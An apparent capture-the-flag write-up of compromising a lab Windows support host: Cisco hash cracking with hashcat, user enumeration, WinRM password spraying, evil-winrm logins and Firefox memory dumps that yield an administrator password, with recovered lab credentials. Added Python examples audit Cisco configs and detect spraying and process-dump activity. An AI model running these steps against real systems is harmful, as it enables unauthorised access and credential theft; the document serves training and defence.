Reconnaissance
Run a scan with nmap.
PORT      STATE SERVICE       REASON          VERSION
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
| http-title: Support Login Page
|_Requested resource was login.php
|_http-server-header: Microsoft-IIS/10.0
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
445/tcp   open  microsoft-ds? syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49669/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Accessing it in a browser shows a page like the following.

Clicking "Login as guest" at the bottom right of the login form takes you to a page that looks like a conversation with support.

Clicking "Attachment" on the first post displays a Cisco router configuration.

Of the Cisco router passwords, those stored as "type 7" can be decoded with sites like the following.
"type 5" passwords can be cracked with the following commands.
echo '$1$pdQG$o8nrSzsGXeaduXrjlvKc91' > cisco.hash
hashcat -m 500 -a 0 cisco.hash ./rockyou.txt
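As an added example that is not part of the original writeup, the following Python audits an IOS configuration for the password storage types discussed above and rates each credential line, which is the check a config reviewer would run before such a file is ever attached to a ticket. The sample config is constructed: it reuses only the type-5 hash shown on this page, and the type-7 strings, the type-9 hash and the vty password are placeholders.

```python
import re
from dataclasses import dataclass

# How a config reviewer should rate each Cisco IOS password storage type.
# Type 7 is reversible obfuscation (the sites the writeup refers to simply
# undo it), type 5 is MD5-crypt and falls to hashcat mode 500 as shown above;
# types 8 (PBKDF2-SHA256) and 9 (scrypt) are the ones to migrate to.
TYPE_INFO = {
    "0": ("cleartext", "CRITICAL"),
    "7": ("reversible obfuscation", "CRITICAL"),
    "5": ("MD5-crypt, crackable offline", "HIGH"),
    "8": ("PBKDF2-SHA256", "OK"),
    "9": ("scrypt", "OK"),
}
SEVERITY_ORDER = ["OK", "HIGH", "CRITICAL"]

# "secret|password [<type>] <blob>"; a missing type digit means cleartext (type 0).
CRED_RE = re.compile(r"\b(secret|password)\s+(?:([0-9])\s+)?(\S+)")


@dataclass
class Finding:
    line_no: int
    line: str
    ptype: str
    severity: str
    note: str


def audit_cisco_config(config: str) -> list:
    """Return one Finding per credential-bearing line of an IOS config."""
    findings = []
    for n, raw in enumerate(config.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("!"):
            continue  # blank lines and comment separators
        m = CRED_RE.search(line)
        if not m:
            continue
        ptype = m.group(2) or "0"
        note, sev = TYPE_INFO.get(ptype, ("unknown storage type", "HIGH"))
        findings.append(Finding(n, line, ptype, sev, note))
    return findings


def worst_severity(findings) -> str:
    """Overall rating of a config: the highest severity among its findings."""
    if not findings:
        return "OK"
    return max((f.severity for f in findings), key=SEVERITY_ORDER.index)


# Constructed sample modelled on the router config attachment the writeup
# describes. The type-5 hash is the one cracked on this page; the type-7
# blobs, the type-9 hash and the vty password are placeholders, not real values.
SAMPLE_CONFIG = """\
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0102030405060708090A0B0C0D0E0F
username admin privilege 15 password 7 0F0E0D0C0B0A090807060504030201
username svc-backup secret 9 $9$PLACEHOLDER/NOT/A/REAL/HASH
!
line vty 0 4
 password cisco123
 login
"""
```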
The password list obtained from the above is as follows.
┌──(kali㉿kali)-[~/htb/heist]
└─$ cat passwords.txt
$uperP@ssword
Q4)sJu\Y8qz*A3?d
stealth1agent
The usernames identified so far are as follows.
┌──(kali㉿kali)-[~/htb/heist]
└─$ cat users.txt
hazard
admin
rout3r
hazard:stealth1agent can be confirmed to be valid over SMB, but I could not get any further from there. I look for more account information.
┌──(kali㉿kali)-[~/htb/heist]
└─$ impacket-lookupsid Hazard:stealth1agent@10.129.96.157
Impacket v0.14.0.dev0+20260109.161801.028f0724 - Copyright Fortra, LLC and its affiliated companies

[*] Brute forcing SIDs at 10.129.96.157
[*] StringBinding ncacn_np:10.129.96.157[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)
The above command confirmed the valid users.
Searching again for valid account information with the nxc command reveals an account that can be used over WinRM.
┌──(kali㉿kali)-[~/htb/heist]
└─$ nxc winrm 10.129.96.157 -u users.txt -p passwords.txt
WINRM       10.129.96.157   5985   SUPPORTDESK      [*] Windows 10 / Server 2019 Build 17763 (name:SUPPORTDESK) (domain:SupportDesk)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\hazard:$uperP@ssword
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\admin:$uperP@ssword
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\rout3r:$uperP@ssword
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\Administrator:$uperP@ssword
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\Guest:$uperP@ssword
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\DefaultAccount:$uperP@ssword
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\WDAGUtilityAccount:$uperP@ssword
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\None:$uperP@ssword
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\Hazard:$uperP@ssword
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\support:$uperP@ssword
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\Chase:$uperP@ssword
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\Jason:$uperP@ssword
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\:$uperP@ssword
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\hazard:Q4)sJu\Y8qz*A3?d
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\Administrator:Q4)sJu\Y8qz*A3?d
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\Guest:Q4)sJu\Y8qz*A3?d
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\DefaultAccount:Q4)sJu\Y8qz*A3?d
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\WDAGUtilityAccount:Q4)sJu\Y8qz*A3?d
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\None:Q4)sJu\Y8qz*A3?d
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\Hazard:Q4)sJu\Y8qz*A3?d
WINRM       10.129.96.157   5985   SUPPORTDESK      [-] SupportDesk\support:Q4)sJu\Y8qz*A3?d
WINRM       10.129.96.157   5985   SUPPORTDESK      [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d (Pwn3d!)
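From the defender's side, the nxc run above leaves a very recognisable trace on SUPPORTDESK: a burst of failed network logons (event 4625, logon type 3) from one source across every local account, followed by a single 4624 for Chase. The following Python, an added detection example that is not part of the original writeup, flags that pattern over constructed events; the source addresses and timestamps are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Local accounts the writeup enumerated with lookupsid; used to build sample events.
USERS = ["hazard", "admin", "rout3r", "Administrator", "Guest", "support", "Chase", "Jason"]
SPRAY_SRC = "10.10.14.5"  # assumed attacker address (constructed)


def build_sample_events():
    """Constructed Security-log events shaped like the nxc run above:
    4625 = failed logon, 4624 = successful logon, logon type 3 = network."""
    events, t = [], datetime(2026, 2, 24, 18, 10, 0)
    for _password_round in range(2):  # two passwords tried against every account
        for u in USERS:
            events.append({"ts": t, "id": 4625, "user": u, "src": SPRAY_SRC, "ltype": 3})
            t += timedelta(seconds=2)
    events.append({"ts": t, "id": 4624, "user": "Chase", "src": SPRAY_SRC, "ltype": 3})
    # benign noise: a single typo from another host must not trigger an alert
    events.append({"ts": t + timedelta(minutes=1), "id": 4625, "user": "jason",
                   "src": "10.10.14.9", "ltype": 3})
    return events


def detect_spray(events, min_users=5, window=timedelta(minutes=10)):
    """Return {source_ip: alert} for sources whose network-logon failures hit at
    least `min_users` distinct accounts inside `window`. The alert records the
    account of any 4624 from the same source after the spray began, because a
    spray that ends in a success (Chase above) is the one that needs response."""
    by_src = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        if e["ltype"] == 3:
            by_src[e["src"]].append(e)
    alerts = {}
    for src, evs in by_src.items():
        fails = [e for e in evs if e["id"] == 4625]
        best, best_start, start = 0, None, 0
        for end in range(len(fails)):  # sliding window over the failures
            while fails[end]["ts"] - fails[start]["ts"] > window:
                start += 1
            users = {e["user"].lower() for e in fails[start:end + 1]}
            if len(users) > best:
                best, best_start = len(users), fails[start]["ts"]
        if best < min_users:
            continue
        success = next((e for e in evs if e["id"] == 4624 and e["ts"] >= best_start), None)
        alerts[src] = {"distinct_users": best, "first_seen": best_start,
                       "success_after_spray": success["user"] if success else None}
    return alerts
```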
Obtaining user.txt
Logging in with the identified account yields user.txt.
┌──(kali㉿kali)-[~/htb/heist]
└─$ evil-winrm -i 10.129.96.157 -u chase -p "Q4)sJu\Y8qz*A3?d"
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chase\Documents>
Privilege Escalation
Firefox can be seen among the running processes.
*Evil-WinRM* PS C:\Users\Chase\Desktop> get-process
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
94 5 868 4048 2980 0 CompatTelRunner
460 19 25796 4216 6260 0 CompatTelRunner
147 9 6612 12112 6756 0 conhost
479 19 2428 5556 364 0 csrss
289 13 2296 5152 476 1 csrss
357 15 3448 14492 2168 1 ctfmon
252 14 3964 13308 3972 0 dllhost
166 9 1852 9696 0.06 6892 1 dllhost
618 32 30468 58104 952 1 dwm
1494 57 23844 79096 5144 1 explorer
355 25 16480 38904 0.17 872 1 firefox
1172 68 124348 202312 6.84 6540 1 firefox
347 19 10260 38740 0.13 6664 1 firefox
401 33 29868 90772 0.81 6792 1 firefox
378 28 22232 58720 0.44 7068 1 firefox
---SNIP---
A Firefox Profiles directory can be found under AppData.
*Evil-WinRM* PS C:\Users\Chase> dir -Force
Directory: C:\Users\Chase
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 4/22/2019 7:14 AM 3D Objects
d--h-- 4/22/2019 7:14 AM AppData
d--hsl 4/22/2019 7:14 AM Application Data
d-r--- 4/22/2019 7:14 AM Contacts
d--hsl 4/22/2019 7:14 AM Cookies
d-r--- 4/22/2019 6:10 PM Desktop
d-r--- 4/22/2019 6:13 PM Documents
d-r--- 2/18/2021 4:03 PM Downloads
d-r--- 4/22/2019 7:14 AM Favorites
d-r--- 4/22/2019 7:14 AM Links
d--hsl 4/22/2019 7:14 AM Local Settings
d-r--- 4/22/2019 7:14 AM Music
d--hsl 4/22/2019 7:14 AM My Documents
d--hsl 4/22/2019 7:14 AM NetHood
d-r--- 4/22/2019 7:14 AM Pictures
d--hsl 4/22/2019 7:14 AM PrintHood
d--hsl 4/22/2019 7:14 AM Recent
d-r--- 4/22/2019 7:14 AM Saved Games
d-r--- 4/22/2019 7:14 AM Searches
d--hsl 4/22/2019 7:14 AM SendTo
d--hsl 4/22/2019 7:14 AM Start Menu
d--hsl 4/22/2019 7:14 AM Templates
d-r--- 4/22/2019 7:14 AM Videos
-a-h-- 12/22/2021 7:51 PM 786432 NTUSER.DAT
-a-hs- 4/22/2019 7:14 AM 188416 ntuser.dat.LOG1
-a-hs- 4/22/2019 7:14 AM 203776 ntuser.dat.LOG2
-a-hs- 4/22/2019 7:19 AM 65536 NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TM.blf
-a-hs- 4/22/2019 7:14 AM 524288 NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TMContainer00000000000000000001.regtrans-ms
-a-hs- 4/22/2019 7:14 AM 524288 NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TMContainer00000000000000000002.regtrans-ms
---hs- 4/22/2019 7:14 AM 20 ntuser.ini
*Evil-WinRM* PS C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Profiles> dir -Force
Directory: C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Profiles
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/24/2026 5:44 PM 77nc64t5.default
Memory dump with procdump64.exe
Use procdump64.exe to obtain credentials from Firefox.
*Evil-WinRM* PS C:\Users\Chase> get-process firefox
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
355 25 16480 38904 0.17 872 1 firefox
1075 68 134312 211188 7.00 6540 1 firefox
347 19 10260 38740 0.13 6664 1 firefox
401 33 30988 92236 0.91 6792 1 firefox
378 28 22144 58644 0.47 7068 1 firefox
*Evil-WinRM* PS C:\Users\Chase> .\procdump64.exe -ma 872 -accepteula
ProcDump v11.1 - Sysinternals process dump utility
Copyright (C) 2009-2025 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com
[18:26:05]Dump 1 info: Available space: 3749519360
[18:26:05]Dump 1 initiated: C:\Users\Chase\firefox.exe_260224_182605.dmp
[18:26:05]Dump 1 writing: Estimated dump file size is 298 MB.
[18:26:09]Dump 1 complete: 298 MB written in 3.9 seconds
[18:26:09]Dump count reached.
*Evil-WinRM* PS C:\Users\Chase> ls
Directory: C:\Users\Chase
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 4/22/2019 7:14 AM 3D Objects
d-r--- 4/22/2019 7:14 AM Contacts
d-r--- 4/22/2019 6:10 PM Desktop
d-r--- 4/22/2019 6:13 PM Documents
d-r--- 2/18/2021 4:03 PM Downloads
d-r--- 4/22/2019 7:14 AM Favorites
d-r--- 4/22/2019 7:14 AM Links
d-r--- 4/22/2019 7:14 AM Music
d-r--- 4/22/2019 7:14 AM Pictures
d-r--- 4/22/2019 7:14 AM Saved Games
d-r--- 4/22/2019 7:14 AM Searches
d-r--- 4/22/2019 7:14 AM Videos
-a---- 2/24/2026 6:26 PM 304699717 firefox.exe_260224_182605.dmp
-a---- 2/24/2026 6:26 PM 0 myeasylog.log
-a---- 2/24/2026 6:24 PM 720968 procdump64.exe
Since the obtained dmp file is binary data, pull the information out of it with the following command.
┌──(kali㉿kali)-[~/htb/heist]
└─$ grep -a "username=" firefox.exe_260224_182605.dmp
ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Users\Chase\AppData\Roaming
CommonProgramFiles=C:\Program Files\Common Files
CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
CommonProgramW6432=C:\Program Files\Common Files
COMPUTERNAME=SUPPORTDESK
ComSpec=C:\Windows\system32\cmd.exe
DriverData=C:\Windows\System32\Drivers\DriverData
HOMEDRIVE=C:
HOMEPATH=\Windows\system32
LOCALAPPDATA=C:\Users\Chase\AppData\Local
MOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Crash Reports
MOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Crash Reports\events
MOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Pending Pings
MOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exe
MOZ_CRASHREPORTER_RESTART_ARG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.ini
NUMBER_OF_PROCESSORS=2
OS=Windows_NT
Path=C:\Program Files\PHP\v7.3;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\Administrator\AppData\Local\Microsoft\WindowsApps;;C:\Users\Chase\AppData\Local\Microsoft\WindowsApps
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE=AMD64
PROCESSOR_IDENTIFIER=AMD64 Family 25 Model 1 Stepping 1, AuthenticAMD
PROCESSOR_LEVEL=25
PROCESSOR_REVISION=0101
ProgramData=C:\ProgramData
ProgramFiles=C:\Program Files
ProgramFiles(x86)=C:\Program Files (x86)
ProgramW6432=C:\Program Files
PSModulePath=%ProgramFiles%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
PUBLIC=C:\Users\Public
SystemDrive=C:
SystemRoot=C:\Windows
TEMP=C:\Users\Chase\AppData\Local\Temp
TMP=C:\Users\Chase\AppData\Local\Temp
USERDOMAIN=SUPPORTDESK
USERNAME=Chase
USERPROFILE=C:\Users\Chase
windir=C:\Windows
__PSLockdownPolicy=1
Running evil-winrm with the credentials found above yields SYSTEM privileges.
┌──(kali㉿kali)-[~/opt/PowerSploit/Exfiltration]
└─$ evil-winrm -i 10.129.96.157 -u administrator -p '4dD!5}x/re8]FBuZ'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
P.S.: Memory dump with Out-Minidump
Output with Out-Minidump also worked.
*Evil-WinRM* PS C:\Users\Chase> . .\Out-Minidump.ps1
*Evil-WinRM* PS C:\Users\Chase> menu
,. ( . ) " ,. ( . ) .
(" ( ) )' ,' (` '` (" ) )' ,' . ,)
.; ) ' (( (" ) ;(, . ;) " )" .; ) ' (( (" ) );(, )((
_".,_,.__).,) (.._( ._), ) , (._..( '.._"._, . '._)_(..,_(_".) _( _')
\_ _____/__ _|__| | (( ( / \ / \__| ____\______ \ / \
| __)_\ \/ / | | ;_)_') \ \/\/ / |/ \| _/ / \ / \
| \\ /| | |__ /_____/ \ /| | | \ | \/ Y \
/_______ / \_/ |__|____/ \__/\ / |__|___| /____|_ /\____|__ /
\/ \/ \/ \/ \/
By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers
[+] Out-Minidump
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] clear
[+] cls
[+] menu
[+] exit
*Evil-WinRM* PS C:\Users\Chase> get-process -id 872 | Out-Minidump
Directory: C:\Users\Chase
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/24/2026 6:54 PM 304631129 firefox_872.dmp
*Evil-WinRM* PS C:\Users\Chase>
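Both dump methods shown in this writeup, procdump64.exe -ma and Out-Minidump, have to open the Firefox process with PROCESS_VM_READ and then write a .dmp file to disk, which is exactly what a Sysmon ProcessAccess (event 10) plus FileCreate (event 11) correlation can catch. The following Python is an added detection example, not code from the writeup or from either tool, run over constructed Sysmon-style events; the access masks and the assumption that Out-Minidump executed inside wsmprovhost.exe (the WinRM provider host that backs the evil-winrm session) are mine.

```python
from datetime import datetime, timedelta

PROCESS_VM_READ = 0x0010  # the access right any memory dump needs
# processes whose memory holds credentials worth protecting (extend per estate)
SENSITIVE = {"lsass.exe", "firefox.exe", "chrome.exe", "msedge.exe"}
# images that read other processes' memory legitimately on Windows (tune per estate)
ALLOW_SOURCES = {"csrss.exe", "werfault.exe", "msmpeng.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect_memory_dumps(events, dmp_window=timedelta(seconds=60)):
    """Flag Sysmon ProcessAccess (event 10) where a non-allowlisted image opens a
    sensitive process with PROCESS_VM_READ; escalate to 'critical' when the same
    image creates a .dmp file (event 11) within dmp_window afterwards."""
    events = sorted(events, key=lambda e: e["ts"])
    dumps = [e for e in events
             if e["id"] == 11 and e["TargetFilename"].lower().endswith(".dmp")]
    alerts = []
    for e in events:
        if e["id"] != 10:
            continue
        src, tgt = basename(e["SourceImage"]), basename(e["TargetImage"])
        access = int(e["GrantedAccess"], 16)
        # a browser opening its own child processes is normal; skip same-image access
        if tgt not in SENSITIVE or src in ALLOW_SOURCES or src == tgt:
            continue
        if not access & PROCESS_VM_READ:
            continue
        dmp = next((d for d in dumps if basename(d["Image"]) == src
                    and timedelta(0) <= d["ts"] - e["ts"] <= dmp_window), None)
        alerts.append({"severity": "critical" if dmp else "high", "source": src,
                       "target": tgt, "access": hex(access),
                       "dump_file": dmp["TargetFilename"] if dmp else None})
    return alerts


# Constructed Sysmon-style events mirroring the two dumps taken in this writeup.
# Assumptions: procdump -ma opens the target with full access (0x1FFFFF);
# Out-Minidump, run from the evil-winrm session, executes inside
# wsmprovhost.exe and opens the target with QUERY_INFORMATION|VM_READ (0x1410).
FIREFOX = r"C:\Program Files\Mozilla Firefox\firefox.exe"
T0 = datetime(2026, 2, 24, 18, 26, 5)
SAMPLE_EVENTS = [
    {"id": 10, "ts": T0, "SourceImage": r"C:\Users\Chase\procdump64.exe",
     "TargetImage": FIREFOX, "GrantedAccess": "0x1FFFFF"},
    {"id": 11, "ts": T0 + timedelta(seconds=4), "Image": r"C:\Users\Chase\procdump64.exe",
     "TargetFilename": r"C:\Users\Chase\firefox.exe_260224_182605.dmp"},
    # benign: Firefox reading its own content processes, and a low-rights query
    {"id": 10, "ts": T0 + timedelta(minutes=1), "SourceImage": FIREFOX,
     "TargetImage": FIREFOX, "GrantedAccess": "0x1410"},
    {"id": 10, "ts": T0 + timedelta(minutes=2), "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": FIREFOX, "GrantedAccess": "0x1000"},
    {"id": 10, "ts": T0 + timedelta(minutes=28), "SourceImage": r"C:\Windows\System32\wsmprovhost.exe",
     "TargetImage": FIREFOX, "GrantedAccess": "0x1410"},
    {"id": 11, "ts": T0 + timedelta(minutes=28, seconds=3),
     "Image": r"C:\Windows\System32\wsmprovhost.exe",
     "TargetFilename": r"C:\Users\Chase\firefox_872.dmp"},
]
```

The root cause the dump exposed is separate from the dump itself: the login form sent the credentials in a GET query string, so the URL (password included) survived in the browser's crash-reporter environment, and the same password was reused for the local Administrator account.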